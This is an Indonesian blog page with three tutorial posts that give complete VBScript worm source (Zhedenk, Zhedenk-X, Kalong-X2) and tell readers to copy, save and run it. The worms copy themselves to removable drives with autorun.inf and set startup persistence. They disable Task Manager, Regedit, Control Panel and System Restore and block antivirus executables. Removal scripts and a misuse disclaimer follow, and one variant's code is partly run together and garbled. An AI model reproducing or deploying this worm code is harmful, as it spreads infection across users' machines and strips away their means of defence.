Showing posts with label Tutorial. Show all posts
Showing posts with label Tutorial. Show all posts

Thursday, January 20, 2011

Membuat Virus Ampuh Menggunakan Notepad 3

1:55 PM  munkz 4riez  No comments

Baik sekarang varian selanjutnya dari Kalong. ZHEDENK-X2. Kelihatannya banyak yang nunggu-nunggu nig. Ayo kita coding di Notepad kode ini, kalau malas tinggal Copy > Paste

Kalo ada yang belum pernah lihat Membuat Virus menggunakan Notepad 2 bisa baca disini dulu.

'Zhedenk-X2
'Varian dari Kalong.VBS
on error resume next

'Dim kata-kata berikut
dim rekur,syspath,windowpath,desades,longka,mf,isi,tf,zhedenk,nt,check,sd

'siapkan isi autorun
isi = "[autorun]" & vbcrlf & "shellexecute=wscript.exe zh3d3nk.sys.vbs"
set longka = createobject("Scripting.FileSystemObject")
set mf = longka.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text = mf.openastextstream(1,-2)
do while not text.atendofstream
rekur = rekur & text.readline
rekur = rekur & vbcrlf
loop
do

'buat file induk
Set windowpath = longka.getspecialfolder(0)
Set syspath = longka.getspecialfolder(1)
set tf = longka.getfile(syspath & "\recycle.vbs")
tf.attributes = 32
set tf = longka.createtextfile(syspath & "\recycle.vbs",2,true)
tf.write rekur
tf.close
set tf = longka.getfile(syspath & "\recycle.vbs")
tf.attributes = 39

'sebar ke removable disc ditambahkan dengan Autorun.inf
for each desades in longka.drives

If (desades.drivetype = 1 or desades.drivetype = 2) and desades.path <> "A:" then

set tf=longka.getfile(desades.path &"\zh3d3nk.sys.vbs")
tf.attributes =32
set tf=longka.createtextfile(desades.path &"\zh3d3nk.sys.vbs",2,true)
tf.write rekur
tf.close
set tf=longka.getfile(desades.path &"\zh3d3nk.sys.vbs")
tf.attributes = 39

set tf =longka.getfile(desades.path &"\autorun.inf")
tf.attributes = 32
set tf=longka.createtextfile(desades.path &"\autorun.inf",2,true)
tf.write isi
tf.close
set tf = longka.getfile(desades.path &"\autorun.inf")
tf.attributes=39
end if
next

'Manipulasi Registry
set zhedenk = createobject("WScript.Shell")

'Ubah IE Title
zhedenk.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title",":: X2 ATTACK ::"

'File Hidden tak terlihat
zhedenk.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden",2, "REG_DWORD"

'Blokir Find, FolderOptions, Run, Regedit, Task Manager, System Restore, perubahan Wallpaper, Hotkey, Control Panel, dan Log Off
zhedenk.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind", "1", "REG_DWORD"
zhedenk.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions", "1", "REG_DWORD"
zhedenk.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun", "1", "REG_DWORD"
zhedenk.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", "1", "REG_DWORD"
zhedenk.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr", "1", "REG_DWORD"
zhedenk.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu", "1", "REG_DWORD"
zhedenk.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoTrayContextMenu", "1", "REG_DWORD"
zhedenk.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop\NoChangingWallpaper", "1", "REG_DWORD"
zhedenk.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoWinKeys", "1", "REG_DWORD"
zhedenk.RegWrite "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore\DisableSR", "1", "REG_DWORD"
zhedenk.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff", "1", "REG_DWORD"
zhedenk.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel", "1", "REG_DWORD"

'Ubah tulisan pertama pada text box menu RUN
zhedenk.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\a", "KALONG-X2/1"
zhedenk.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\MRUList", "a"

'Buat pesan saat Windows Startup
zhedenk.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption", "KALONG-X2"
zhedenk.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeText", "Komputer Anda Diambil Alih"

'Aktifkan saat Windows Startup
zhedenk.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Ageia", syspath & "\recycle.vbs"

'Ubah Default Start Page Internet Explorer
zhedenk.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page", "http://www.vaksin.com"

'Alihkan aplikasi berikut. Jika dibuka maka program terbuka dengan Notepad
zhedenk.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe\Debugger",”“
zhedenk.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\install.exe\Debugger",”“
zhedenk.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe\Debugger",”“
zhedenk.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe\Debugger",”“
zhedenk.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedt32.exe\Debugger",”“
zhedenk.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RegistryEditor.exe\Debugger",”“
zhedenk.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setup.exe\Debugger",”“
zhedenk.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV.exe\Debugger",”“
zhedenk.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-CLN.exe\Debugger",”“
zhedenk.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-RTP.exe\Debugger",”“
zhedenk.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wordpad.exe\Debugger",”“
zhedenk.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\VB6.exe\Debugger",”“
zhedenk.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\autorun.exe\Debugger",”“
zhedenk.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ansav.exe\Debugger",”“
zhedenk.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\viremoval.exe\Debugger",”“
zhedenk.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\viremover.exe\Debugger",”“

'Bonus
if check <> 1 then
Wscript.sleep 200000
end if
loop while check <> 1
set sd = createobject("Wscript.shell")
sd.run windowpath & "\explorer.exe /e,/select, " & Wscript.ScriptFullname


Iya… seperti biasa klik FILE > SAVE. Di save as type pilih “ALL FILES” dan simpan dengan nama “zh3d3nk.sys.vbs”. Dan jalankan, sudah saya cek ulang jadi tidak ada kesalahan lagi.

Nah, sekarang kita akan buat Removal (antidot) dari virus ini. Pertama stop process yang bernama : wscript.exe. (jangan pake Task Manager, pake tool penggantinya, apa kek)
Coding juga dengan Notepad :

'ANTI-KALONGX2

Dim Zhedenk

set zhedenk = createobject("WScript.Shell")

zhedenk.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind", "0", "REG_DWORD"
zhedenk.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions", "0", "REG_DWORD"
zhedenk.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun", "0", "REG_DWORD"
zhedenk.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", "0", "REG_DWORD"
zhedenk.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr", "0", "REG_DWORD"
zhedenk.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu", "0", "REG_DWORD"
zhedenk.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoTrayContextMenu", "0", "REG_DWORD"
zhedenk.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop\NoChangingWallpaper", "0", "REG_DWORD"
zhedenk.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoWinKeys", "0", "REG_DWORD"
zhedenk.RegWrite "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore\DisableSR", "0", "REG_DWORD"
zhedenk.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff", "0", "REG_DWORD"
zhedenk.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel", "0", "REG_DWORD"
zhedenk.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title","INTERNET EXPLORER"
zhedenk.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\a", ""
zhedenk.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption", ""
zhedenk.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeText", ""
zhedenk.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Ageia", ""
zhedenk.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe\Debugger",""
zhedenk.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\install.exe\Debugger",""
zhedenk.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe\Debugger", ""
zhedenk.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe\Debugger", ""
zhedenk.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedt32.exe\Debugger",""
zhedenk.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RegistryEditor.exe\Debugger",""
zhedenk.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setup.exe\Debugger",""
zhedenk.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV.exe\Debugger",""
zhedenk.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-CLN.exe\Debugger",""
zhedenk.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-RTP.exe\Debugger",""
zhedenk.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wordpad.exe\Debugger",""
zhedenk.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\VB6.exe\Debugger",""
zhedenk.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\autorun.exe\Debugger",""
zhedenk.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ansav.exe\Debugger",""
zhedenk.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\viremoval.exe\Debugger",""
zhedenk.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\viremover.exe\Debugger",""
zhedenk.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page", "http://www.google.com"

Simpan dengan nama “zhedenkx2removal.vbs”. Lalu jalankan deh…. Seperti biasa ya, membuat virus dan anti-nya dengan Notepad pula. Semoga bermanfaat. Dan jika ada penyalah-gunaan saya tak bertanggung jawab.

Read More

Membuat Virus Menggunakan Notepad 2

1:46 PM  munkz 4riez  No comments

Melanjutkan artikel yang waktu itu “Membuat Virus Menggunakan Notepad” kita akan membuat virus yang lebih hebat lagi.

Nah kita akan buat varian lain dari ZHEDENK.VBS. Yaitu ZHEDENK-X.VBS. Lebih hebat dari Zhedenk.VBS. Sebenarnya ini varian ketiga. Varian keduanya Anda bisa lihat di www.farislab.net.tf.

Sebenarnya virus ini sama saja dengan Zhedenk.VBS namun ditambahkan kemampuan manipulasi registry yang lebih mengerikan

Ayo sekarang kita buka saja Notepadnya dan ketikkan code berikut. Jika malas kan tinggal Copy > Paste….
'Zhedenk-X
'Varian dari Zhedenk.VBS
on error resume next

'Dim kata-kata berikut
dim rekur,windowpath,desades,fs,mf,isi,tf,zhedenk,nt,check,sd

'siapkan isi autorun
isi = "[autorun]" & vbcrlf & "shellexecute=wscript.exe zh3d3nkms32.dll.vbs"
set fs = createobject("Scripting.FileSystemObject")
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text = mf.openastextstream(1,-2)
do while not text.atendofstream
rekur = rekur & text.readline
rekur = rekur & vbcrlf
loop
do


'buat file induk
Set windowpath = fs.getspecialfolder(0)
set tf = fs.getfile(windowpath & "\zh3d3nk-x.dll.vbs")
tf.attributes = 32
set tf = fs.createtextfile(windowpath & "\zh3d3nk-x.dll.vbs",2,true)
tf.write rekur
tf.close
set tf = fs.getfile(windowpath & "\zh3d3nk-x.dll.vbs")
tf.attributes = 39

'sebar ke removable disc ditambahkan dengan Autorun.inf
for each desades in fs.drives

If (desades.drivetype = 1 or desades.drivetype = 2) and desades.path <> "A:" then


set tf=fs.getfile(desades.path &"\zh3d3nkms32.dll.vbs")
tf.attributes =32
set tf=fs.createtextfile(desades.path &"\zh3d3nkms32.dll.vbs",2,true)
tf.write rekur
tf.close
set tf=fs.getfile(desades.path &"\zh3d3nkms32.dll.vbs")
tf.attributes = 39


set tf =fs.getfile(desades.path &"\autorun.inf")
tf.attributes = 32
set tf=fs.createtextfile(desades.path &"\autorun.inf",2,true)
tf.write isi
tf.close
set tf = fs.getfile(desades.path &"\autorun.inf")
tf.attributes=39
end if
next

'Manipulasi Registry
set kalong = createobject("WScript.Shell")

'Ubah IE Title
zhedenk.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title",":: ->ZHEDENKG-X<- ::" 'File Hidden tak terlihat zhedenk.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden",2, "REG_DWORD" 'Blokir Find, FolderOptions, Run, Regedit, Task Manager, dan klik kanan zhedenk.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind", "1", "REG_DWORD" zhedenk.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions", "1", "REG_DWORD" zhedenk.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun", "1", "REG_DWORD" zhedenk.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", "1", "REG_DWORD" zhedenk.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr", "1", "REG_DWORD" zhedenk.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu", "1", "REG_DWORD" 'Buat pesan saat Windows Startup zhedenk.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption", "THE ZHEDENK-X" zhedenk.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeText","No reason for Panic" 'Aktifkan saat Windows Startup zhedenk.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Systemdir", windowpath & "\zh3d3nk-x.dll.vbs" 'Alihkan aplikasi berikut. Jika dibuka maka program terbuka dengan Notepad zhedenk.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe\Debugger","notepad.exe" zhedenk.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\install.exe\Debugger","notepad.exe" zhedenk.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe\Debugger","notepad.exe" zhedenk.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe\Debugger","notepad.exe" zhedenk.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedt32.exe\Debugger","notepad.exe" zhedenk.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RegistryEditor.exe\Debugger","notepad.exe" zhedenk.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setup.exe\Debugger","notepad.exe" zhedenk.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV.exe\Debugger","notepad.exe" zhedenk.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-CLN.exe\Debugger","notepad.exe" zhedenk.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-RTP.exe\Debugger","notepad.exe" 'Bonus if check <> 1 then
Wscript.sleep 200000
end if
loop while check <> 1
set sd = createobject("Wscript.shell")
sd.run windowpath & "\explorer.exe /e,/select, " & Wscript.ScriptFullname

Setelah Anda menempatkan kode tersebut klik FILE > SAVE. Di File Type pilih ALL FILES (*.*) lalu simpan dengan nama zh3d3nkms32.dll.vbs. Setelah itu coba Anda jalankan. Dan ya, Anda telah menjalankan ZHEDENK-X.VBS di komputer Anda.
Jika Anda membuka aplikasi yang bernama : cmd.exe, install.exe, msconfig.exe, regedit.exe, regedt32.exe, RegistryEditor.exe, setup.exe, PCMAV.exe, PCMAV-CLN.exe, dan PCMAV-RTP.exe maka akan terbuka Notepad

Ingat jadilah orang yang bermanfaat bagi orang lain. Tidak ada “barang berbahaya” disini karena Andalah yang membuatnya berbahaya. Saya tidak bertanggung jawab apabila Anda menyalah gunakan kode ini. Ini untuk ilmu pengetahuan semata. Pokoknya segala kenekatan Anda ditanggung oleh Anda sendiri.

Virus ini punya kemampuan Autorun jadi komputer yang dicolokkan Removable Disc (Mislanya Flash Disc) yang terinfeksi virus ini akan diinfeksi pula (jika Autorun tidak di non-aktifkan)

NOTE: Untuk membersihkan Zhedenk-X caranya mudah. Tinggal hentikan proses yang bernama wscript.exe. Jika di WinNT Anda bisa melakukannya lewat Task Manager. Tapi kalau Win9X silahkan cari tool pengganti Task Manager misalnya Procexp atau CurrProcess. Soalnya terkadang kalau lewat perintah Command Prompt gak bisa.

Setelah Anda memberhentikan proses wscript.exe hapus file induk yang bernama zh3d3nk-x.dll.vbs di WINDOWSDIR (C:\Windows misalnya). Jika tidak ada tampilkan dulu file hidden dengan Folder Options. Setelah itu perbaiki Registry. Untuk mempercepat salin kode ini ke Notepad :
[Version]
Signature="$Chicago$"
Provider=Fariskhi

[DefaultInstall]
AddReg=UnhookRegKey
DelReg=del

[UnhookRegKey]
HKCU,Software\Microsoft\Internet Explorer\Main, Window Title,0, "INTERNET EXPLORER"

[del]
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoFind
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoFolderOptions
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoRun
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\System, DisableRegistryTools
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\System, DisableTaskMgr
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoViewContextMenu
HKLM, Software\Microsoft\Windows\CurrentVersion\Winlogon, LegalNoticeCaption
HKLM, Software\Microsoft\Windows\CurrentVersion\Winlogon, LegalNoticeText
HKLM, Software\Microsoft\Windows\CurrentVersion\Run, Systemdir
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\install.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedt32.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RegistryEditor.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setup.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-CLN.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-RTP.exe, Debugger


Setelah itu save dengan FILE TYPE : ALL FILES (*.*) dan simpan dengan nama : zhedenkxremoval.inf. Setelah itu klik kanan file tersebut dan pilih install. Jadi kita buat Virus dan Antidotnya sama-sama dengan Notepad.

Read More

Membuat Virus hanya menggunakan Notepad

1:37 PM  munkz 4riez  No comments

Sesuai dengan judul artikel Membuat Virus hanya menggunakan Notepad. Virus ini akan membuat dirinya menyebar ke removable disc dengan AutoRun sehingga komputer lain yang tercolok flash disc terinfeksi akan langsung menjadi korban tanpa menunggu User menjalankan infector-nya. Virus ini saya beri nama “Zhedenk.VBS”. Sekarang buka Notepad-nya. Copy kode berikut :

'//--Awal dari kode, set agar ketika terjadi Error dibiarkan dan kemudian lanjutkan kegiatan virus--//
on error resume next

'//--Dim kata-kata berikut ini--//
dim rekur,windowpath,flashdrive,fs,mf,isi,tf,zhedenk,nt,check,sd

'//--Set sebuah teks yang nantinya akan dibuat untuk Autorun Setup Information--//
isi = "[autorun]" & vbcrlf & "shellexecute=wscript.exe zh3d3nk.dll.vbs"
set fs = createobject("Scripting.FileSystemObject")
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text = mf.openastextstream(1,-2)
do while not text.atendofstream
rekur = rekur & text.readline
rekur = rekur & vbcrlf
loop
do

'//--Copy diri untuk menjadi file induk di Windows Path (example: C:\Windows)
Set windowpath = fs.getspecialfolder(0)
set tf = fs.getfile(windowpath & "\batch- zh3d3nk.dll.vbs ")
tf.attributes = 32
set tf=fs.createtextfile(windowpath & "\batch- zh3d3nk.dll.vbs",2,true)
tf.write rekur
tf.close
set tf = fs.getfile(windowpath & "\batch- zh3d3nk.dll.vbs ")
tf.attributes = 39
'//--Buat Atorun.inf untuk menjalankan virus otomatis setiap flash disc tercolok--//
‘Menyebar ke setiap drive yang bertype 1 dan 2(removable) termasuk disket

for each flashdrive in fs.drives
'//--Cek Drive--//
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> "A:" then

'//--Buat Infector jika ternyata Drivetypr 1 atau 2. Atau A:\--//
set tf=fs.getfile(flashdrive.path &"\zh3d3nk.dll.vbs ")
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &"\zh3d3nk.dll.vbs ",2,true)
tf.write rekur
tf.close
set tf=fs.getfile(flashdrive.path &"\zh3d3nk.dll.vbs ")
tf.attributes = 39

'//--Buat Atorun.inf yang teks-nya tadi sudah disiapkan (Auto Setup Information)--//
set tf =fs.getfile(flashdrive.path &"\autorun.inf")
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &"\autorun.inf",2,true)
tf.write isi
tf.close
set tf = fs.getfile(flashdrive.path &"\autorun.inf")
tf.attributes=39
end if
next

'//--Manipulasi Registry--//

set kalong = createobject("WScript.Shell")

'//--Manip - Ubah Title Internet Explorer menjadi THE ZHEDENK v.s. ZAY--//
kalong.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title"," THE ZHEDENK v.s. ZAY "

'//--Manip – Set agar file hidden tidak ditampilkan di Explorer--//
kalong.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden", "0", "REG_DWORD"

'//--Manip – Hilangkan menu Find, Folder Options, Run, dan memblokir Regedit dan Task Manager--//
kalong.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind", "1", "REG_DWORD"
kalong.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions", "1", "REG_DWORD"
kalong.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun", "1", "REG_DWORD"
kalong.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", "1", "REG_DWORD"
kalong.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr", "1", "REG_DWORD"

'//--Manip – Disable klik kanan--//
kalong.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu", "1", "REG_DWORD"

'//--Manip - Munculkan Pesan Setiap Windows Startup--//
kalong.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption", "Worm Zhedenk. Variant from Rangga-Zay, don’t panic all data are safe."

'//--Manip – Aktif setiap Windows Startup--//
kalong.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Systemdir", windowpath & "\batch- zh3d3nk.dll.vbs "

'//--Manip – Ubah RegisteredOwner dan Organization--//
kalong.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization", "The Batrix"
kalong.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner","Zhedenk"

'//--Nah kalau kode dibawah ini saya nggak tau, tolong Mas Aat_S untuk menjelaskan--//
if check <> 1 then
Wscript.sleep 200000
end if
loop while check <> 1
set sd = createobject("Wscript.shell")
sd.run windowpath & "\explorer.exe /e,/select, " & Wscript.ScriptFullname
'Akhir dari Kode


Save code di Notepad dengan cara FILE > SAVE. Lalu di save as type pilih “All Files (*.*). Simpan dengan nama : zh3d3nk.dll.vbs. Sebenarnya gak usah pake *.dll juga gak apa-apa tapi usaha agar tidak mencurigakan aja.

Read More

Share

Twitter Delicious Facebook Digg Stumbleupon Favorites More